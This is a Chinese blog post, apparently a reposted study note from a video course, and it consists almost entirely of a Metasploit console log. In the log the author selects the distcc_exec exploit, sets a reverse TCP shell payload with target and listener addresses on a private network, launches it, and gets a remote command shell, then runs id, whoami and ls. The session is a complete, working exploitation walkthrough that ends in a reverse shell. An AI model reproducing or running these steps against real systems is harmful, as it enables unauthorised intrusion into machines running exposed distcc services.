上个礼拜去旅游,累出翔来了,真想不明白为什么那么多人花钱去买罪受。今天更新一篇,最近在做51的视频教程,旅游回来一直没缓过来劲,这算是学习笔记吧。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
|
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
System information as of Wed Jul 31 14:55:12 CST 2013
System load: 0.31 Processes: 149
Usage of /: 72.0% of 19.06GB Users logged in: 1
Memory usage: 25% IP address for eth0: 192.168.11.40
Swap usage: 3%
=> There is 1 zombie process.
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Wed Jul 31 14:31:36 2013 from 192.168.11.5
root@bt:~#
root@bt:~#
root@bt:~# msfpro
[*] Starting Metasploit Console...
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1138 exploits - 718 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 192.168.11.17
RHOST => 192.168.11.17
msf exploit(distcc_exec) > set LHOST 192.168.11.40
LHOST => 192.168.11.40
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ruCpcMy2m0BrAfbq;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ruCpcMy2m0BrAfbq\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.11.40:4444 -> 192.168.11.17:58472) at 2013-07-31 14:59:21 +0800
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
cd /
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
|
本文转自文东会博客51CTO博客,原文链接http://blog.51cto.com/hackerwang/1261479如需转载请自行联系原作者
谢文东666